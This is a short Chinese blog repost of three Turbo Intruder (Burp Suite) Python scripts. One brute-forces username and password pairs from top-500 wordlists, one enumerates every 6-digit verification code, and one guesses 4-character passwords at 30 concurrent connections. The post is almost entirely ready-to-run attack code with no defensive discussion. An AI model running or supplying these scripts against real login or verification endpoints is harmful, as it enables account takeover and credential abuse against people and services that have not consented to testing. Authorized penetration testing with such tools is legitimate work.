当前位置:网站首页>turbo intruder常用脚本

turbo intruder常用脚本

2022-07-07 21:50:00 b1ackc4t

爆破用户名密码

from urllib import quote
def user_password_brute(target, engine):
    for password in open("D:\\crypto\\mutou\\fuzzDicts\\passwordDict\\top500.txt"):
        for user in open("D:\\crypto\\mutou\\fuzzDicts\\userNameDict\\top500.txt"):
            engine.queue(target.req,[quote(user.rstrip()),quote(password.rstrip())])
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    #user_brute(target,engine)
    #password_brute(target,engine)
    user_password_brute(target,engine)
def handleResponse(req, interesting):
    table.add(req)

爆破6位验证码

from itertools import product

def brute_veify_code(target, engine, length):
   pattern = '1234567890'
   for i in list(product(pattern, repeat=length)):
        code =  ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
   engine = RequestEngine(endpoint=target.endpoint,
           concurrentConnections=30,
           requestsPerConnection=100,
           pipeline=True
           )
   brute_veify_code(target, engine, 6)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
	table.add(req)

爆破密码

from itertools import product

def brute_veify_code(target, engine, length):
   pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
   for i in list(product(pattern, repeat=length)):
        code =  ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
   engine = RequestEngine(endpoint=target.endpoint,
           concurrentConnections=30,
           requestsPerConnection=100,
           pipeline=True
           )
   brute_veify_code(target, engine, 4)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
    if 'password not match' not in req.response:
        table.add(req)
原网站

版权声明
本文为[b1ackc4t]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_49835838/article/details/125584169